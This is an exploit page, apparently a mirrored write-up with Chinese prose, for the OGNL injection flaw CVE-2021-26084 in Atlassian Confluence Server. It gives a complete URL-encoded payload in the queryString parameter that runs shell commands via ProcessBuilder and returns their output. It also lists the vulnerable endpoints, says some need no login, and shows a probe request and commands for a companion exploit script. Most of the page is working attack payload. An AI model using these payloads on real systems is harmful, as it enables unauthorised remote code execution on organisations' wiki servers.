Exploit for Expression Language Injection in Atlassian Confluence Server CVE-2021-26084

## https://sploitus.com/exploit?id=3E0FF5E7-F93E-588A-B40A-B3381FB12F73
# CVE-2021-26084
CVE-2021-26084，Atlassian Confluence OGNL注入漏洞

Atlassian Confluence 是企业广泛使用的维基系统，其部分版本中存在OGNL 表达式注入漏洞。攻击者可以通过漏洞，不需要任何用户的情况下在目标Confluence 中执行任意代码。

queryString参数执行任意命令
------
```
queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
```
/pages/createpage.action
这个接口需要一个可以创建页面的用户权限：

/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027

![image](https://user-images.githubusercontent.com/91398948/138823352-08ff1fc2-adea-4e64-bdfa-df5cde0ca3de.png)

```
http://your-ip:8090/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
```

![image](https://user-images.githubusercontent.com/91398948/138823589-ef4bcae0-61ca-4825-9c9b-79db3063044e.png)

/pages/createpage-entervariables.action

/pages/doenterpagevariables.action

不需要登录，用POST请求

![image](https://user-images.githubusercontent.com/91398948/138827501-97703a55-43b3-49b5-b5b8-fd2c8233144a.png)

脚本测试：
------
命令:

```
python3 -r test.txt
```

![image](https://user-images.githubusercontent.com/91398948/138988855-18a97bbd-20b5-4680-b83d-b7131a79f134.png)

脚本利用:
------
命令:

```
python3 -u http://example.com
```

![image](https://user-images.githubusercontent.com/91398948/138989019-56728d4b-4f21-4e54-a781-95c8be890dd6.png)


参考：
-------

https://github.com/vulhub/vulhub/blob/master/confluence/

https://github.com/h3v0x/CVE-2021-26084_Confluence

https://www.cnblogs.com/huangxiaosan/p/14290034.html

https://blog.csdn.net/weixin_43072923/article/details/117083611